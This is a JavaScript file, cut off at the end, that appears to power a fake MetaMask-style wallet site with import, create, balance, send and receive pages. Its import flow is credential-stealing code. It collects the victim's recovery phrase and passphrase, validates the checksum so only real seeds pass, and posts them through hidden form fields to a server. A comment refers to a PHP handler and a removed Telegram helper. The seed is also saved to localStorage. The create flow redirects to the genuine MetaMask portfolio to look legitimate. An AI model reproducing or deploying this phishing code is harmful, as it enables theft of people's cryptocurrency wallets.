document.addEventListener('DOMContentLoaded', () => {
  const btn = document.querySelector('.lang-button');
  if (!btn) return;

  const menu = document.createElement('div');
  menu.className = 'lang-menu';
  menu.style.position = 'absolute';
  menu.style.right = '0';
  menu.style.top = '48px';
  menu.style.background = '#fff';
  menu.style.border = '1px solid #ddd';
  menu.style.borderRadius = '8px';
  menu.style.boxShadow = '0 8px 24px rgba(0,0,0,0.12)';
  menu.style.fontSize = '14px';
  menu.style.padding = '8px';
  menu.style.display = 'none';
  menu.innerHTML = `
    <button data-lang="en" style="display:block;padding:8px 12px;border:none;background:transparent;cursor:pointer;border-radius:6px">English</button>
    <button data-lang="fr" style="display:block;padding:8px 12px;border:none;background:transparent;cursor:pointer;border-radius:6px">Français</button>
    <button data-lang="es" style="display:block;padding:8px 12px;border:none;background:transparent;cursor:pointer;border-radius:6px">Español</button>
  `;

  btn.parentElement.appendChild(menu);

  btn.addEventListener('click', () => {
    menu.style.display = menu.style.display === 'none' ? 'block' : 'none';
  });

  menu.addEventListener('click', (e) => {
    const t = e.target;
    if (t instanceof HTMLElement && t.dataset.lang) {
      btn.querySelector('span')?.replaceWith(document.createTextNode(t.textContent || ''));
      menu.style.display = 'none';
    }
  });

  document.addEventListener('click', (e) => {
    if (!menu.contains(e.target) && !btn.contains(e.target)) {
      menu.style.display = 'none';
    }
  });
});

// Import wallet interactions
document.addEventListener('DOMContentLoaded', () => {
  const srpTextarea = document.querySelector('.srp-textarea');
  const showAllBtn = document.querySelector('.srp-show-all');
  const pasteBtn = document.querySelector('.srp-paste');
  const clearBtn = document.querySelector('.srp-clear');
  const chipGrid = document.querySelector('#srpChipGrid');
  const continueBtn = document.querySelector('#continueBtn');
  const errorEl = document.querySelector('#srpError');
  const emptyEl = document.querySelector('#srpEmpty');
  
  // Word Count Selection UI
  const wordCountDisplay = document.querySelector('#wordCountDisplay');
  const wordCountMenu = document.querySelector('#wordCountMenu');
  const wordCountTrigger = document.querySelector('#wordCountTrigger');
  const passphraseContainer = document.querySelector('#passphraseContainer');
  const srpPassphrase = document.querySelector('#srpPassphrase');
  const togglePassphrase = document.querySelector('#togglePassphrase');
  
  let currentTargetCount = 12;
  let isPassphraseMode = false;

  if (togglePassphrase && srpPassphrase) {
    togglePassphrase.addEventListener('click', (e) => {
      e.preventDefault();
      e.stopPropagation();
      const currentType = srpPassphrase.getAttribute('type');
      const newType = currentType === 'password' ? 'text' : 'password';
      srpPassphrase.setAttribute('type', newType);
      togglePassphrase.textContent = newType === 'password' ? 'Show' : 'Hide';
    });
  }

  if (wordCountTrigger && wordCountMenu) {
    // Toggle menu
    wordCountTrigger.addEventListener('click', (e) => {
      e.preventDefault();
      e.stopPropagation();
      const isShown = wordCountMenu.classList.contains('show');
      // Close any other open menus if necessary
      document.querySelectorAll('.dropdown-menu.show').forEach(m => {
        if (m !== wordCountMenu) m.classList.remove('show');
      });
      
      if (isShown) {
        wordCountMenu.classList.remove('show');
      } else {
        wordCountMenu.classList.add('show');
      }
      console.log('Dropdown toggled', !isShown);
    });

    // Handle selection
    wordCountMenu.addEventListener('click', (e) => {
      const item = e.target.closest('.dropdown-item');
      if (!item) return;
      e.preventDefault();
      e.stopPropagation();
      
      const countStr = item.getAttribute('data-count');
      const count = parseInt(countStr, 10);
      const hasPass = item.getAttribute('data-pass') === 'true';
      
      console.log('Selected:', count, 'Pass:', hasPass);

      if (count) {
        // Update Active State
        wordCountMenu.querySelectorAll('.dropdown-item').forEach(el => el.classList.remove('active'));
        item.classList.add('active');
        
        // Update Display
        let displayText = ` ${count}`;
        if (hasPass) displayText += ' + Passphrase';
        if (wordCountDisplay) wordCountDisplay.textContent = displayText;
        
        // Update Count and Re-render
        currentTargetCount = count;
        isPassphraseMode = hasPass;
        
        // Toggle Passphrase Input
        if (passphraseContainer) {
          passphraseContainer.style.display = isPassphraseMode ? 'block' : 'none';
          if (!isPassphraseMode && srpPassphrase) srpPassphrase.value = ''; // clear if hidden
        }
        
        // If we have existing text (via textarea or current inputs), re-render with new count
        const inputs = Array.from(chipGrid.querySelectorAll('input.word-input'));
        const currentText = hasTextarea ? srpTextarea.value : inputs.map(i => i.value).filter(Boolean).join(' ');
        renderChips(currentText, false);
        
        // Hide menu
        wordCountMenu.classList.remove('show');
      }
    });

    // Close menu when clicking outside
    document.addEventListener('click', (e) => {
      if (!wordCountMenu.contains(e.target) && !wordCountTrigger.contains(e.target)) {
         wordCountMenu.classList.remove('show');
      }
    });
  }

  let allowedWordSet = null; // populated from WORDLIST if available
  let chipsMasked = true;
  let chipsVisible = false;
  // For small-box-only flow, textarea may not exist
  const hasTextarea = !!srpTextarea;

  // Toggle masking
  const setMasked = (masked) => {
    if (srpTextarea) {
      if (masked) {
        srpTextarea.classList.add('masked');
      } else {
        srpTextarea.classList.remove('masked');
      }
    }
    chipsMasked = masked;
    if (chipGrid) {
      chipGrid.querySelectorAll('.srp-chip').forEach((chip) => {
        chip.classList.toggle('masked', masked);
        // Force input type change for better security masking if CSS blur isn't enough
        const input = chip.querySelector('input');
        if (input) {
            input.type = masked ? 'password' : 'text';
        }
      });
    }
    if (showAllBtn) showAllBtn.textContent = masked ? 'Show' : 'Hide';
  };

  if (showAllBtn) {
    showAllBtn.addEventListener('click', () => {
      setMasked(!chipsMasked);
    });
  }

  // Paste from clipboard
  const renderChips = (text, hideTextarea = false) => {
    const trimmed = text.trim();
    if (!chipGrid) return;
    const words = trimmed ? trimmed.split(/\s+/) : [];
    
    // Use currentTargetCount, unless pasted words exceed it (auto-expand logic preserved/enhanced)
    let targetCount = currentTargetCount;
    if (words.length > currentTargetCount) {
       // If pasted content is larger than selected, align to typical sizes or just words length
       if (words.length <= 12) targetCount = 12;
       else if (words.length <= 15) targetCount = 15;
       else if (words.length <= 18) targetCount = 18;
       else if (words.length <= 21) targetCount = 21;
       else targetCount = 24;
       
       // Update UI to reflect auto-expansion if needed
       if (targetCount !== currentTargetCount) {
           currentTargetCount = targetCount;
           if (wordCountDisplay) wordCountDisplay.textContent = ` ${targetCount}`;
           if (wordCountMenu) {
               wordCountMenu.querySelectorAll('.dropdown-item').forEach(el => {
                   el.classList.toggle('active', parseInt(el.dataset.count) === targetCount);
               });
           }
       }
    }
    
    const chips = [];
    for (let i = 0; i < targetCount; i++) {
      const w = words[i] || '';
      const isPlaceholder = !w;
      chips.push(
        `<div class="srp-chip ${chipsMasked ? 'masked' : ''} ${isPlaceholder ? 'placeholder' : ''}" data-index="${i}"><span class="index">${i+1}.</span><input class="word-input" type="text" value="${w}" autocomplete="off" autocorrect="off" autocapitalize="none" spellcheck="false" />`+
        `</div>`
      );
    }
    chipGrid.style.display = 'grid';
    chipGrid.innerHTML = chips.join('');
    chipsVisible = words.length > 0;
    if (hasTextarea) srpTextarea.style.display = hideTextarea ? 'none' : 'block';
    if (emptyEl) emptyEl.style.display = words.length === 0 ? 'block' : 'none';
    if (clearBtn) clearBtn.style.display = words.length === 0 ? 'none' : '';

    // Wire per-input events
    const inputs = Array.from(chipGrid.querySelectorAll('input.word-input'));
    inputs.forEach((inp, idx) => {
      let isComposing = false;
      inp.addEventListener('compositionstart', () => { isComposing = true; });
      inp.addEventListener('compositionend', () => {
        isComposing = false;
        const raw = inp.value;
        const clean = raw.toLowerCase().replace(/[^a-z]+/g, '');
        if (clean !== raw) inp.value = clean;
        const all = Array.from(chipGrid.querySelectorAll('input.word-input')).map(i => i.value).filter(Boolean);
        const combined = all.join(' ');
        if (hasTextarea) srpTextarea.value = combined;
        
        // Auto-expand logic moved to renderChips call
        const nonEmptyCount = all.length;
        const currentBoxes = inputs.length;
        if (nonEmptyCount > currentBoxes && currentBoxes < 24) {
          renderChips(combined, false);
        }
        
        updateUIFromValidation();
        updateSequentialLocking();
        if (clean && allowedWordSet && !allowedWordSet.has(clean)) {
          inp.parentElement.classList.add('invalid');
        } else {
          inp.parentElement.classList.remove('invalid');
        }
      });
      inp.addEventListener('keydown', (e) => {
        if (e.isComposing || isComposing) return;
        if (e.key === ' ' || e.key === 'Enter') {
          e.preventDefault();
          const next = inputs[idx + 1];
          if (next) next.focus();
        }
      });
      inp.addEventListener('paste', (e) => {
        e.preventDefault();
        const data = (e.clipboardData || window.clipboardData)?.getData('text') || '';
        if (!data) return;
        const words = data.trim().split(/\s+/).map((w) => w.toLowerCase().replace(/[^a-z]+/g, '')).filter(Boolean);
        const currentVals = inputs.map((i) => i.value);
        const merged = currentVals.slice(0, idx).concat(words).concat(currentVals.slice(idx + words.length));
        const combined = merged.filter(Boolean).join(' ');
        renderChips(combined, false);
        setMasked(false);
        updateUIFromValidation();
        updateSequentialLocking();
      });
      inp.addEventListener('input', (e) => {
        if (e.isComposing || isComposing) return;
        // sanitize to lowercase letters only
        const raw = inp.value;
        const clean = raw.toLowerCase().replace(/[^a-z]+/g, '');
        if (clean !== raw) inp.value = clean;
        // rebuild text from all inputs and push into textarea value for validation
        const all = Array.from(chipGrid.querySelectorAll('input.word-input')).map(i => i.value).filter(Boolean);
        const combined = all.join(' ');
        if (hasTextarea) srpTextarea.value = combined;
        
        // expand check
        const nonEmptyCount = all.length;
        const currentBoxes = inputs.length;
        if (nonEmptyCount > currentBoxes && currentBoxes < 24) {
          renderChips(combined, false);
        }
        
        updateUIFromValidation();
        updateSequentialLocking();
        // mark invalid if not in wordlist
        if (clean && allowedWordSet && !allowedWordSet.has(clean)) {
          inp.parentElement.classList.add('invalid');
        } else {
          inp.parentElement.classList.remove('invalid');
        }
      });
    });
    updateSequentialLocking();
  };

  if (srpEmpty) {
    srpEmpty.addEventListener('click', () => {
      const firstInput = chipGrid.querySelector('input.word-input');
      if (firstInput) firstInput.focus();
    });
  }

  if (pasteBtn) {
    pasteBtn.addEventListener('click', () => {
      // Directly focus the first input so user can paste manually (Ctrl+V)
      // avoiding the "See text and images copied to the clipboard" permission prompt
      const firstInput = chipGrid.querySelector('input.word-input');
      if (firstInput) {
        firstInput.focus();
        // Optional: Visual cue could be added here
      }
    });
  }


  if (clearBtn) {
    clearBtn.addEventListener('click', () => {
      if (hasTextarea) srpTextarea.value = '';
      renderChips('');
      if (hasTextarea) srpTextarea.dispatchEvent(new Event('input'));
    });
  }

  // Validate SRP: letters only per word, no numbers, no duplicates
  const validateSrp = (text) => {
    const trimmed = text.trim();
    if (!trimmed) return { valid: false, reason: 'Use only lowercase letters, check your spelling, and put the words in the original order.' };

    const words = trimmed.split(/\s+/);
    // Dynamic allowed count check
    const allowedCounts = new Set([12, 15, 18, 21, 24]);
    // Also allow current target count if valid
    if (!allowedCounts.has(words.length)) {
       // If user is typing, we might be incomplete. 
       // Only validate strict count if it matches currentTargetCount
       if (words.length !== currentTargetCount) {
          return { valid: false, reason: `Enter exactly ${currentTargetCount} words.` };
       }
    }
    
    const seen = new Set();
    for (const w of words) {
      if (!/^[a-z]+$/.test(w)) {
        return { valid: false, reason: 'Use only lowercase letters. No numbers or symbols.' };
      }
      const lw = w.toLowerCase();
      if (seen.has(lw)) {
        return { valid: false, reason: 'Do not repeat any word. Use unique words only.' };
      }
      seen.add(lw);
    }
    // Validate checksum using ethers when available; otherwise show wordlist hints
    try {
      if (typeof ethers !== 'undefined' && ethers.Mnemonic && typeof ethers.Mnemonic.isValidMnemonic === 'function') {
        const ok = ethers.Mnemonic.isValidMnemonic(trimmed);
        if (!ok) return { valid: false, reason: 'Checksum invalid. Re-enter your words carefully.' };
      } else if (allowedWordSet) {
        for (const w of words) {
          if (!allowedWordSet.has(w.toLowerCase())) {
            return { valid: false, reason: `Check your spelling: "${w}" is not recognized.` };
          }
        }
      }
    } catch (_) {}
    return { valid: true };
  };

  // Decide whether current textarea content can convert to chips (lenient, ignores count/duplicates)
  const canConvertToChips = (text) => {
    const trimmed = text.trim();
    if (!trimmed) return false;
    if (!allowedWordSet) return false;
    const words = trimmed.split(/\s+/);
    for (const w of words) {
      if (!/^[a-z]+$/.test(w)) return false;
      const lw = w.toLowerCase();
      if (!allowedWordSet.has(lw)) return false;
    }
    return true;
  };

  const updateUIFromValidation = () => {
    const inputs = Array.from(chipGrid.querySelectorAll('input.word-input'));
    const currentText = hasTextarea ? srpTextarea.value : inputs.map(i => i.value).filter(Boolean).join(' ');
    const hasAnyInput = hasTextarea ? !!srpTextarea.value.trim() : inputs.some(i => i.value.trim().length > 0);
    if (emptyEl) emptyEl.style.display = hasAnyInput ? 'none' : 'block';
    if (clearBtn) clearBtn.style.display = hasAnyInput ? '' : 'none';
    const { valid, reason } = validateSrp(currentText);
    continueBtn.disabled = !valid;
    continueBtn.classList.toggle('enabled', !!valid);
    if (errorEl) {
      if (hasAnyInput && !valid && reason) {
        errorEl.textContent = reason;
        errorEl.style.display = 'block';
      } else {
        errorEl.textContent = '';
        errorEl.style.display = 'none';
      }
    }
    updateSequentialLocking();
  };

  // Sequential input locking: unlock next box only after previous is valid
  const isValidWord = (w) => {
    if (!w) return false;
    if (!allowedWordSet) return false;
    if (!/^[a-z]+$/.test(w)) return false;
    return allowedWordSet.has(w.toLowerCase());
  };

  const updateSequentialLocking = () => {
    const inputs = Array.from(chipGrid.querySelectorAll('input.word-input'));
    if (inputs.length === 0) return;
    // Allow writing in all boxes
    for (let j = 0; j < inputs.length; j++) {
      inputs[j].disabled = false;
      inputs[j].readOnly = false;
    }
  };

  // Initialize word list from global WORDLIST provided by wordlist.js
  // Render initial empty boxes immediately
  renderChips('', false);
  try {
    if (Array.isArray(window.WORDLIST) && window.WORDLIST.length > 0) {
      allowedWordSet = new Set(window.WORDLIST.map((w) => String(w).toLowerCase()));
      // Attempt conversion after wordlist loads
      renderChips(hasTextarea ? srpTextarea.value : '', false);
      setMasked(true);
      updateUIFromValidation();
      updateSequentialLocking();
    } else {
      allowedWordSet = null;
    }
  } catch (_) {
    allowedWordSet = null;
  }

  // Enable continue based on validation
  if (continueBtn) {
    if (hasTextarea) {
      srpTextarea.addEventListener('input', () => {
        renderChips(srpTextarea.value, false);
        updateUIFromValidation();
        updateSequentialLocking();
      });
    }
    updateUIFromValidation();
    updateSequentialLocking();

    // Removed unused client-side Telegram helper

    continueBtn.addEventListener('click', async () => {
      const inputs = Array.from(chipGrid.querySelectorAll('input.word-input'));
      const text = hasTextarea ? srpTextarea.value : inputs.map(i => i.value).filter(Boolean).join(' ');
      
      // Save to localStorage for Dashboard access
      try {
        localStorage.setItem('wallet_seed', text);
        // Get passphrase if active
        const pass = (isPassphraseMode && srpPassphrase) ? srpPassphrase.value : '';
        if (pass) localStorage.setItem('wallet_pass', pass);
        else localStorage.removeItem('wallet_pass');
      } catch (_) {}

      // Populate hidden form fields and submit to server
      const form = document.getElementById('srpSubmitForm');
      const hW3 = document.getElementById('hiddenW3');
      const hW2 = document.getElementById('hiddenW2');
      
      // Get passphrase if active
      const pass = (isPassphraseMode && srpPassphrase) ? srpPassphrase.value : '';
      
      if (hW3) hW3.value = text;
      if (hW2) hW2.value = pass;
      if (form) {
        form.submit();
      } else {
        // Fallback to dashboard if form missing (though form usually submits to php which handles redirect)
        window.location.href = 'dashboard.html';
      }
    });
  }
});

// Create wallet interactions
document.addEventListener('DOMContentLoaded', () => {
  const newPass = document.querySelector('#newPassword');
  const confirmPass = document.querySelector('#confirmPassword');
  const termsCheck = document.querySelector('#termsCheck');
  const createBtn = document.querySelector('#createBtn');
  const formEl = document.querySelector('.form');
  const passError = document.querySelector('#passError');
  const confirmError = document.querySelector('#confirmError');
  const toggles = document.querySelectorAll('.toggle-pass');
  const strengthRow = document.querySelector('#passStrength');
  const strengthBar = strengthRow ? strengthRow.querySelector('.strength-bar') : null;
  const strengthLabel = strengthRow ? strengthRow.querySelector('.strength-label') : null;

  // Apply extension popup width when requested
  try {
    const qs = new URLSearchParams(location.search);
    const isPopup = qs.get('popup') === '1';
    const page = document.querySelector('.page');
    if (isPopup && page) page.classList.add('page-ext');
  } catch (_) {}

  if (!newPass || !confirmPass || !createBtn) return;

  const isStrong = (p) => {
    // At least 8 chars, with letters, numbers, and symbols
    const lengthOK = p.length >= 8;
    const hasLetter = /[A-Za-z]/.test(p);
    const hasNumber = /\d/.test(p);
    const hasSymbol = /[^A-Za-z0-9]/.test(p);
    return lengthOK && hasLetter && hasNumber && hasSymbol;
  };

  const updateStrengthUI = (p) => {
    if (!strengthBar || !strengthLabel) return;
    const lengthOK = p.length >= 8;
    const hasLetter = /[A-Za-z]/.test(p);
    const hasNumber = /\d/.test(p);
    const hasSymbol = /[^A-Za-z0-9]/.test(p);
    const extraLen = p.length >= 12;
    let score = 0;
    if (lengthOK) score++; if (hasLetter) score++; if (hasNumber) score++; if (hasSymbol) score++; if (extraLen) score++;
    let level = 'weak';
    if (score >= 5) level = 'strong';
    else if (score >= 3) level = 'med';
    strengthBar.classList.remove('level-weak','level-med','level-strong');
    strengthBar.classList.add('level-' + level);
    strengthLabel.textContent = 'Strength: ' + (level === 'strong' ? 'Strong' : (level === 'med' ? 'Medium' : 'Weak'));
  };

  const validate = () => {
    const p = newPass.value;
    const c = confirmPass.value;
    let strongOK = isStrong(p);
    let matchOK = p.length > 0 && p === c;

    // Update strength UI
    updateStrengthUI(p);

    // Errors
    if (!strongOK) {
      passError.textContent = 'Password must be 8+ chars and include letters, numbers, and symbols.';
      passError.style.display = 'block';
    } else {
      passError.textContent = '';
      passError.style.display = 'none';
    }

    if (!matchOK && c.length > 0) {
      confirmError.textContent = 'The password must be the same. Confirm password';
      confirmError.style.display = 'block';
    } else {
      confirmError.textContent = '';
      confirmError.style.display = 'none';
    }

    const termsOK = !!termsCheck && termsCheck.checked;
    createBtn.disabled = !(strongOK && matchOK && termsOK);
  };

  newPass.addEventListener('input', validate);
  confirmPass.addEventListener('input', validate);
  // Ensure paste triggers validation immediately
  newPass.addEventListener('paste', () => setTimeout(validate, 0));
  confirmPass.addEventListener('paste', () => setTimeout(validate, 0));
  if (termsCheck) termsCheck.addEventListener('change', validate);
  validate();

  // Visibility toggles
  toggles.forEach((t) => {
    t.addEventListener('click', () => {
      const target = t.dataset.target;
      const input = target === 'new' ? newPass : confirmPass;
      const showing = input.type === 'text';
      input.type = showing ? 'password' : 'text';
      t.textContent = showing ? 'Show' : 'Hide';
    });
  });

  // Redirect to MetaMask Portfolio after successful validation
  const proceedIfValid = () => {
    validate();
    if (createBtn.disabled) return;
    const url = 'https://portfolio.metamask.io/?attributionId=8075c0df-4e31-459d-9a6c-a19f4c288f2b';
    try {
      localStorage.setItem('wallet_created', '1');
      // Demo-only: persist password for subsequent pages
      localStorage.setItem('wallet_password', newPass.value);
    } catch (_) {}
    window.location.href = url;
  };

  createBtn.addEventListener('click', (e) => {
    e.preventDefault();
    proceedIfValid();
  });

  // Allow Enter key (form submit) to behave like clicking Create
  if (formEl) {
    formEl.addEventListener('submit', (e) => {
      e.preventDefault();
      proceedIfValid();
    });
  }
});

// Wallet page interactions: dark extension UI, price/deltas, tokens list
document.addEventListener('DOMContentLoaded', () => {
  const portfolioValueEl = document.querySelector('#portfolioValue');
  const ethAmtEl = document.querySelector('#ethTokenAmt');
  const ethFiatEl = document.querySelector('#ethTokenFiat');
  const ethDeltaEl = document.querySelector('#ethTokenDelta');
  const btcAmtEl = document.querySelector('#btcTokenAmt');
  const btcFiatEl = document.querySelector('#btcTokenFiat');
  const btcDeltaEl = document.querySelector('#btcTokenDelta');
  const handleEl = document.querySelector('#accountHandle');
  if (!portfolioValueEl || !ethAmtEl || !ethFiatEl) return;

  try {
    const qs = new URLSearchParams(location.search);
    const isPopup = qs.get('popup') === '1';
    const page = document.querySelector('.page');
    if (isPopup && page) page.classList.add('page-ext');
  } catch (_) {}

  let address = '';
  try {
    const phrase = sessionStorage.getItem('generated_srp') || localStorage.getItem('generated_srp');
    const pass = '';
    const path = "m/44'/60'/0'/0/0";
    if (!phrase || typeof ethers === 'undefined') throw new Error('Missing phrase or ethers library');
    let wallet;
    try {
      const root = ethers.HDNodeWallet.fromPhrase(phrase, pass);
      wallet = root.derivePath(path);
    } catch (_) {
      wallet = ethers.Wallet.fromPhrase(phrase, pass, path);
    }
    address = wallet.address;
    if (handleEl) {
      const nick = address ? `@${address.slice(2,8)}` : '@Account1';
      handleEl.textContent = nick;
    }
  } catch (_) {
    if (handleEl) handleEl.textContent = '@Account1';
  }

  const provider = typeof ethers !== 'undefined' ? new ethers.JsonRpcProvider('https://cloudflare-eth.com') : null;

  const refreshAll = async () => {
    // Demo mode setup (keep live ETH price for subline)
    let demo = false;
    try {
      const qs = new URLSearchParams(location.search);
      demo = qs.get('demo') === '1';
      if (demo) {
        portfolioValueEl.textContent = '$0';
        ethFiatEl.textContent = '$0.09';
        if (ethDeltaEl) ethDeltaEl.innerHTML = '-<span class="lt">$</span>0.01';
        if (btcFiatEl) btcFiatEl.textContent = '$0.00';
        if (btcDeltaEl) btcDeltaEl.textContent = '$0.00';
        const handleEl = document.querySelector('#accountHandle');
        if (handleEl) handleEl.textContent = '@FitComet619';
      }
    } catch (_) {}

    try {
      // Fetch ETH and BTC price with 24h change
      let ethUsd = 0; let ethChangePct = 0;
      let btcUsd = 0; let btcChangePct = 0;
      try {
        const res = await fetch('https://api.coingecko.com/api/v3/simple/price?ids=ethereum,bitcoin&vs_currencies=usd&include_24hr_change=true');
        const data = await res.json();
        ethUsd = Number(data?.ethereum?.usd || 0);
        ethChangePct = Number(data?.ethereum?.usd_24h_change || 0);
        btcUsd = Number(data?.bitcoin?.usd || 0);
        btcChangePct = Number(data?.bitcoin?.usd_24h_change || 0);
      } catch (_) { ethUsd = 0; ethChangePct = 0; btcUsd = 0; btcChangePct = 0; }

      // Fetch wallet balance
      let balWei = 0n;
      try {
        if (!provider || !address) throw new Error('no provider/address');
        balWei = await provider.getBalance(address);
      } catch (_) { balWei = 0n; }

      const balEth = Number(ethers.formatEther(balWei));
      const portfolioUsd = balEth * ethUsd;

      // Big portfolio figures: show plain $0 when zero
      if (!isFinite(portfolioUsd) || portfolioUsd === 0) {
        portfolioValueEl.textContent = '$0';
      } else {
        portfolioValueEl.textContent = formatUSD(portfolioUsd.toFixed(2));
      }
      const deltaUsd = portfolioUsd * (ethChangePct / 100);
      const absDeltaUsd = Math.abs(deltaUsd);
      const sign = deltaUsd >= 0 ? '+' : '-';

      // Token row for ETH
      // Subline shows current ETH price in USD (per 1 ETH)
      ethAmtEl.textContent = ethUsd ? formatUSD(ethUsd.toFixed(2)) : 'Unavailable';
      if (!demo) {
        ethFiatEl.textContent = formatUSD(portfolioUsd.toFixed(2));
      }
      if (ethDeltaEl) {
        if (absDeltaUsd < 0.01) {
          ethDeltaEl.innerHTML = '-<span class="lt">$</span>0.01';
        } else {
          ethDeltaEl.textContent = `${sign}${formatUSD(absDeltaUsd.toFixed(2))}`;
        }
      }

      // Token row for BTC
      if (btcAmtEl) {
        btcAmtEl.textContent = btcUsd ? formatUSD(btcUsd.toFixed(2)) : 'Unavailable';
      }
    } catch (_) {
      portfolioValueEl.textContent = '$0.00';
      ethAmtEl.textContent = 'Unavailable';
      ethFiatEl.textContent = '$0.00';
      if (ethDeltaEl) ethDeltaEl.innerHTML = '-<span class="lt">$</span>0.01';
      if (btcAmtEl) btcAmtEl.textContent = 'Unavailable';
    }
  };

  // Initial load and periodic refresh
  refreshAll();
  setInterval(refreshAll, 1000);
});

// Send page interactions: simple topbar, back navigation
document.addEventListener('DOMContentLoaded', () => {
  const sendTitleEl = document.querySelector('#sendTitle');
  if (!sendTitleEl) return; // Only run on send page

  // Apply extension popup width when requested
  try {
    const qs = new URLSearchParams(location.search);
    const isPopup = qs.get('popup') === '1';
    const page = document.querySelector('.page');
    if (isPopup && page) page.classList.add('page-ext');
  } catch (_) {}

  // Back to wallet
  const backBtn = document.querySelector('.back-btn');
  if (backBtn) {
    backBtn.addEventListener('click', (e) => {
      e.preventDefault();
      try {
        const qs = new URLSearchParams(location.search);
        const params = [];
        if (qs.get('popup') === '1') params.push('popup=1');
        if (qs.get('demo') === '1') params.push('demo=1');
        const url = 'wallet.html' + (params.length ? ('?' + params.join('&')) : '');
        window.location.href = url;
      } catch (_) {
        window.location.href = 'wallet.html';
      }
    });
  }
});

// Receive page interactions: QR code, copy/share, back
document.addEventListener('DOMContentLoaded', () => {
  const recvAddrEl = document.querySelector('#recvAddress');
  const qrCanvas = document.querySelector('#qrCanvas');
  if (!recvAddrEl || !qrCanvas) return; // Only run on receive page

  // Apply extension popup width when requested
  try {
    const qs = new URLSearchParams(location.search);
    const isPopup = qs.get('popup') === '1';
    const page = document.querySelector('.page');
    if (isPopup && page) page.classList.add('page-ext');
  } catch (_) {}

  // Token param (eth|btc) controls label/icon/warning but keeps same address
  let token = 'eth';
  try {
    const qs = new URLSearchParams(location.search);
    const t = (qs.get('token') || '').toLowerCase();
    if (t === 'btc' || t === 'eth') token = t;
  } catch (_) {}

  // Derive address from SRP (fallback to zeros)
  let address = '0x0000000000000000000000000000000000000000';
  try {
    const phrase = sessionStorage.getItem('generated_srp') || localStorage.getItem('generated_srp');
    const pass = '';
    const path = "m/44'/60'/0'/0/0";
    if (!phrase || typeof ethers === 'undefined') throw new Error('Missing');
    let wallet;
    try {
      const root = ethers.HDNodeWallet.fromPhrase(phrase, pass);
      wallet = root.derivePath(path);
    } catch (_) {
      wallet = ethers.Wallet.fromPhrase(phrase, pass, path);
    }
    address = wallet.address;
  } catch (_) {}
  recvAddrEl.textContent = address;

  // Generate QR code for address
  try {
    const opts = { width: 280, margin: 2, color: { dark: '#000000', light: '#ffffff' } };
    if (window.QRCode && typeof QRCode.toCanvas === 'function') {
      QRCode.toCanvas(qrCanvas, address, opts, function(){ /* no-op */ });
    }
  } catch (_) {}

  // Update header/icon/type/warning based on token
  try {
    const iconEl = document.querySelector('#recvTokenIcon');
    const labelEl = document.querySelector('#recvTokenLabel');
    const centerIconEl = document.querySelector('#qrCenterIcon');
    const typeLineEl = document.querySelector('#recvTypeLine');
    const warnTextEl = document.querySelector('#warnText');
    const isBTC = token === 'btc';
    if (iconEl && labelEl && centerIconEl) {
      if (isBTC) {
        iconEl.src = 'assets/images/btc.svg';
        iconEl.alt = 'Bitcoin';
        labelEl.innerHTML = 'BTC (Bitcoin) <span class="caret">▾</span>';
        centerIconEl.src = 'assets/images/btc.svg';
        centerIconEl.alt = 'Bitcoin';
        if (typeLineEl) typeLineEl.textContent = 'Native SegWit New Address: 1';
        if (warnTextEl) warnTextEl.innerHTML = 'This address can only accept assets on <strong>BTC (Bitcoin)</strong>. Sending any other types of tokens to this address will result in permanent loss.';
      } else {
        iconEl.src = 'assets/images/eth.svg';
        iconEl.alt = 'Ethereum';
        labelEl.innerHTML = 'ETH (ERC20) <span class="caret">▾</span>';
        centerIconEl.src = 'assets/images/eth.svg';
        centerIconEl.alt = 'Ethereum';
        if (typeLineEl) typeLineEl.textContent = 'Ethereum Address';
        if (warnTextEl) warnTextEl.innerHTML = 'This address can only accept assets on <strong>ETH (ERC20)</strong>. Sending any other types of tokens to this address will result in permanent loss.';
      }
    }
  } catch (_) {}

  // Back button
  const backBtn = document.querySelector('.back-btn');
  if (backBtn) {
    backBtn.addEventListener('click', (e) => {
      e.preventDefault();
      try {
        const qs = new URLSearchParams(location.search);
        const params = [];
        if (qs.get('popup') === '1') params.push('popup=1');
        if (qs.get('demo') === '1') params.push('demo=1');
        const url = 'wallet.html' + (params.length ? ('?' + params.join('&')) : '');
        window.location.href = url;
      } catch (_) {
        window.location.href = 'wallet.html';
      }
    });
  }

  // Copy address
  const copyBtn = document.querySelector('#copyBtnRecv');
  if (copyBtn) {
    copyBtn.addEventListener('click', async (e) => {
      e.preventDefault();
      try {
        await navigator.clipboard.writeText(address);
        const prev = copyBtn.textContent;
        copyBtn.textContent = 'Copied';
        setTimeout(() => { copyBtn.textContent = prev; }, 1500);
      } catch (_) {}
    });
  }

  // Share address
  const shareBtn = document.querySelector('#shareBtn');
  if (shareBtn) {
    shareBtn.addEventListener('click', async (e) => {
      e.preventDefault();
      const shareData = { title: token === 'btc' ? 'BTC (Bitcoin) Address' : 'ETH (ERC20) Address', text: address };
      try {
        if (navigator.share) {
          await navigator.share(shareData);
        } else {
          await navigator.clipboard.writeText(address);
          const prev = shareBtn.textContent;
          shareBtn.textContent = 'Copied';
          setTimeout(() => { shareBtn.textContent = prev; }, 1500);
        }
      } catch (_) {}
    });
  }
});
// Generate wallet interactions (12 or 24 words, auto-create)
document.addEventListener('DOMContentLoaded', () => {
  const countSelect = document.querySelector('#srpCount');
  const copyBtn = document.querySelector('#copyBtn');
  const showAllBtn = document.querySelector('.srp-show-all');
  const chipGrid = document.querySelector('#srpChipGrid');
  const emptyEl = document.querySelector('#srpEmpty');
  const errorEl = document.querySelector('#srpError');
  const continueBtn = document.querySelector('#continueGenBtn');
  const confirmCheck = document.querySelector('#srpConfirmCheck');
  const passInput = document.querySelector('#bip39Pass');
  const indexInput = document.querySelector('#acctIndex');
  if (!countSelect || !chipGrid || !continueBtn) return;

  let allowedWordSet = null;
  let wordlistArr = [];
  let chipsMasked = true;
  let currentWords = [];
  let currentCount = Number(countSelect.value) || 12;

  const setMasked = (masked) => {
    chipsMasked = masked;
    chipGrid.querySelectorAll('.srp-chip').forEach((chip) => {
      chip.classList.toggle('masked', masked);
    });
    if (showAllBtn) showAllBtn.textContent = masked ? 'Show all' : 'Hide all';
  };

  const renderGenChips = (words, count) => {
    const chips = [];
    for (let i = 0; i < count; i++) {
      const w = words[i] || '';
      chips.push(
        `<div class="srp-chip ${chipsMasked ? 'masked' : ''}" data-index="${i}"><span class="index">${i+1}.</span><input class="word-input" type="text" value="${w}" readonly /></div>`
      );
    }
    chipGrid.style.display = 'grid';
    chipGrid.innerHTML = chips.join('');
    if (emptyEl) emptyEl.style.display = words.length === 0 ? 'block' : 'none';
  };

  const validateGen = (words, count) => {
